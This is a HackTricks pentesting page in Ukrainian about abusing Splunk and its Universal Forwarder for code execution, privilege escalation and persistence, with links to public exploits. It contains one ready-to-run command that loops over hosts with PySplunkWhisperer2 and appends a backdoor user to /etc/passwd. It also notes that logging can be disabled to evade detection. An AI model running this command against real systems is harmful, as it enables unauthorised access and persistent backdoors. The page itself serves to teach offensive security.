HackTricksSplunk LPE та Постійну
Reading time: 3 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Якщо ви перераховуєте машину всередині або ззовні і знаходите запущений Splunk (порт 8090), якщо вам пощастить знати будь-які дійсні облікові дані, ви можете зловживати сервісом Splunk для виконання оболонки від імені користувача, який запускає Splunk. Якщо його запускає root, ви можете підвищити привілеї до root.
Також, якщо ви вже root і сервіс Splunk не слухає лише на localhost, ви можете вкрасти файл паролів з сервісу Splunk і зламати паролі, або додати нові облікові дані до нього. І підтримувати постійність на хості.
На першому зображенні нижче ви можете побачити, як виглядає веб-сторінка Splunkd.
Резюме експлуатації агента Splunk Universal Forwarder
Для отримання додаткових деталей перегляньте пост https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. Це лише резюме:
Огляд експлуатації: Експлуатація, що націлена на агента Splunk Universal Forwarder (UF), дозволяє зловмисникам з паролем агента виконувати довільний код на системах, що запускають агента, потенційно компрометуючи всю мережу.
Ключові моменти:
- Агент UF не перевіряє вхідні з'єднання або автентичність коду, що робить його вразливим до несанкціонованого виконання коду.
- Загальні методи отримання паролів включають їх знаходження в мережевих каталогах, файлових спільних ресурсах або внутрішній документації.
- Успішна експлуатація може призвести до доступу на рівні SYSTEM або root на скомпрометованих хостах, ексфільтрації даних та подальшого проникнення в мережу.
Виконання експлуатації:
- Зловмисник отримує пароль агента UF.
- Використовує API Splunk для відправки команд або скриптів агентам.
- Можливі дії включають витяг файлів, маніпуляцію обліковими записами користувачів та компрометацію системи.
Вплив:
- Повна компрометація мережі з правами SYSTEM/root на кожному хості.
- Потенціал для відключення журналювання, щоб уникнути виявлення.
- Встановлення бекдорів або програм-вимагачів.
Приклад команди для експлуатації:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
Використовувані публічні експлойти:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
Зловживання запитами Splunk
Для отримання додаткової інформації перегляньте пост https://blog.hrncirik.net/cve-2023-46214-analysis
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.